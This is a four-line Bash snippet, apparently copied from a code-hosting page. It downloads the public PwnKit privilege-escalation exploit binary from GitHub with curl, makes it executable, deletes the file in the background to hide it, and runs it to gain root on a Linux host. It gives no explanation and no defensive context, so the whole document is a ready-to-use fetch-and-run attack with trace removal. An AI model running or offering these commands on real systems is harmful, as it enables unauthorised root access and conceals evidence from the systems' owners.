5 lines
135 B
Bash
5 lines
135 B
Bash
|
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
|
||
|
chmod +x ./PwnKit
|
||
|
(sleep 1 && rm ./PwnKit & )
|
||
|
./PwnKit
|